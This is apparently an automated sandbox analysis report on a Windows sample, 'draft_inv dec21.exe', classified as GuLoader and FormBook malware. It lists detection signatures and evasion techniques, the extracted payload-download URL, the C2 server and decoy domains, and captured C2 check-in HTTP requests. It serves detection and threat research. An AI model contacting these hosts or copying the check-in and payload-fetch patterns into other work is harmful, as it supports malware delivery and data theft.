Windows Analysis Report draft_inv dec21.exe

Overview

General Information

Sample Name: draft_inv dec21.exe
Analysis ID: 531747
MD5: 89a584acaeb2f9e8baf46714eb7d3550
SHA1: 263ff0b238d57cfc30492f8801530b9986dcae38
SHA256: 59ae017767f6a56eba79abdad1343cba3643744f4668b320c30fda283abdedf2
Infos:

Most interesting Screenshot:

Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
GuLoader behavior detected
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to resolve many domain names, but no domain seems valid
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.ayudavida.com/n8ds/"], "decoy": ["topwowshopping.store", "helpcloud.xyz", "reliablehomesellers.com", "lopsrental.lease", "luxalbridi.com", "recoverytrivia.com", "apps365.one", "shrywl.com", "ozattaos.xyz", "recruitresumelibrary.com", "receiptpor.xyz", "stylesbykee.com", "dczhd.com", "learncodeing.com", "cmoigus.net", "unitedmetal-saudi.com", "koedayuuki.com", "dif-directory.xyz", "heyvecino.com", "mariforum.com", "mackthetruck.com", "quickcoreohio.com", "wordpresshostingblog.com", "peo-campaign.com", "hsbp.online", "divorcefearfreedom.com", "testwebsite0711.com", "khoashop.com", "32342231.xyz", "inklusion.online", "jobl.space", "maroonday.com", "mummymotors.com", "diamota.com", "effective.store", "theyachtmarkets.com", "braxtynmi.xyz", "photon4energy.com", "dubaicars.online", "growebox.com", "abcjanitorialsolutions.com", "aubzo7o9fm.com", "betallsports247.com", "nphone.tech", "diggingquartz.com", "yghdlhax.xyz", "paulalescanorealestate.com", "chaudharyhamza.com", "jamiecongedo.com", "gdav130.xyz", "dietatrintadias.com", "csenmoga.com", "avto-click.com", "goldcoastdoublelot.com", "blueitsolutions.info", "fatima2021.com", "talkingpoint.tours", "smartam6.xyz", "tvterradafarinha.com", "palmasdelmarcondos.com", "3uwz9mpxk77g.biz", "zzytyzf.top", "writingmomsobitwithmom.com", "littlefishth.com"]}
Source: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin"}
Multi AV Scanner detection for submitted file
Source: draft_inv dec21.exe Virustotal: Detection: 26% Perma Link
Source: draft_inv dec21.exe Metadefender: Detection: 20% Perma Link
Source: draft_inv dec21.exe ReversingLabs: Detection: 17%
Yara detected FormBook
Source: Yara match File source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.dif-directory.xyz/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c Avira URL Cloud: Label: phishing
Source: http://www.receiptpor.xyz/n8ds/?gHl=tFWpUqTJBKKZjj7mpmRmO+UO9YCEuI1l6CuT88R3V9vk9mUNjYvQT6q9cPheoq+XMEYl&4ha8=4hi0dlyHZliDfr Avira URL Cloud: Label: phishing
Source: http://www.dubaicars.online/n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs Avira URL Cloud: Label: phishing
Source: http://www.dubaicars.online/n8ds/?gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs&pB=z2JtXhtxAhidvN Avira URL Cloud: Label: phishing
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Te6-t4\zbcdidj04hd0ibmx.exe Metadefender: Detection: 20% Perma Link
Source: C:\Users\user\AppData\Local\Temp\Te6-t4\zbcdidj04hd0ibmx.exe ReversingLabs: Detection: 17%
Antivirus or Machine Learning detection for unpacked file
Source: 11.2.svchost.exe.405796c.4.unpack Avira: Label: TR/Dropper.Gen
Source: 11.2.svchost.exe.3418000.1.unpack Avira: Label: TR/Dropper.Gen

Compliance:

barindex
Uses 32bit PE files
Source: draft_inv dec21.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 162.241.120.147:443 -> 192.168.11.20:49790 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: draft_inv dec21.exe, 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6917984326.0000000003700000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6922850532.0000000003900000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: draft_inv dec21.exe, draft_inv dec21.exe, 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 0000000B.00000003.6917984326.0000000003700000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6922850532.0000000003900000.00000004.00000001.sdmp
Source: Binary string: svchost.pdb source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6918937488.00000000000D0000.00000040.00020000.sdmp
Source: Binary string: svchost.pdbUGP source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6918937488.00000000000D0000.00000040.00020000.sdmp

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 164.155.212.139:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 164.155.212.139:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 164.155.212.139:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49794 -> 44.227.76.166:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49794 -> 44.227.76.166:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49794 -> 44.227.76.166:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 216.250.120.206:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 216.250.120.206:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 216.250.120.206:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49804 -> 35.244.144.199:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49804 -> 35.244.144.199:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49804 -> 35.244.144.199:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 185.68.16.57:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 185.68.16.57:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 185.68.16.57:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.82.227:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.82.227:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.82.227:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49813 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49813 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49813 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 34.237.47.210:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 34.237.47.210:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 34.237.47.210:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 185.68.16.57:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 185.68.16.57:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 185.68.16.57:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 35.244.144.199:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 35.244.144.199:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 35.244.144.199:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 44.227.76.166:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 44.227.76.166:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 44.227.76.166:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.244.144.199 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 216.250.120.206 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.117.168.233 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.98.5.234 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 44.227.76.166 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 50.118.200.120 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.68.16.57 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.23.172.127 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.237.47.210 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 199.59.242.153 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.29.140.185 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.61.153.97 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.2.194.128 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 203.170.80.250 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 164.155.212.139 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.82.227 80 Jump to behavior
Performs DNS queries to domains with low reputation
Source: DNS query: www.receiptpor.xyz
Source: DNS query: www.dif-directory.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.gdav130.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.ozattaos.xyz
Source: DNS query: www.smartam6.xyz
Source: DNS query: www.yghdlhax.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin
Source: Malware configuration extractor URLs: www.ayudavida.com/n8ds/
Tries to resolve many domain names, but no domain seems valid
Source: unknown DNS traffic detected: query: www.smartam6.xyz replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.tvterradafarinha.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.wordpresshostingblog.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.abcjanitorialsolutions.com replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.recruitresumelibrary.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.testwebsite0711.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.yghdlhax.xyz replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.talkingpoint.tours replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.braxtynmi.xyz replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.cmoigus.net replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.csenmoga.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.3uwz9mpxk77g.biz replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.photon4energy.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.jobl.space replaycode: Name error (3)
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4 HTTP/1.1Host: www.ayudavida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.quickcoreohio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=HP3lUcly75+aK0axQNs5BYQcBP4O+AKLEkTZ4laoLz9/Sn12VzNllTYHErR4gbC1MkpJ&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.luxalbridi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr HTTP/1.1Host: www.apps365.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=tFWpUqTJBKKZjj7mpmRmO+UO9YCEuI1l6CuT88R3V9vk9mUNjYvQT6q9cPheoq+XMEYl&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.receiptpor.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=f/B16EdvHg/4mql2vq5Md1sx/t71Njj4R8zlekrOfJu06zuLM7yaFZuMLQOQaJsZfcYK HTTP/1.1Host: www.writingmomsobitwithmom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.growebox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.quickcoreohio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=Sj2jHWqmlaqVQSbjgunx+H7yNQtdqjg6ckEoQlWTrRUvY2HVGecaPyLp6mXUMYnymgSe&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.dczhd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?pB=z2JtXhtxAhidvN&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.dubaicars.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?pB=z2JtXhtxAhidvN&gHl=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fIl1=6lYt5jhP&gHl=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j HTTP/1.1Host: www.ozattaos.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&3fIl1=6lYt5jhP HTTP/1.1Host: www.littlefishth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1 HTTP/1.1Host: www.fatima2021.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs HTTP/1.1Host: www.dubaicars.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=B50h1ADlVgBVReAtZzXZoMMEQCBylsFCBP4nBu/XE2swHcOtDXvVzvqty7hRo1ZxzC15&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.heyvecino.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.apps365.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4 HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.54.117.217 198.54.117.217
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 36
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /GHDFR/bin_rOlFDOAa61.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: statuswar.infoCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
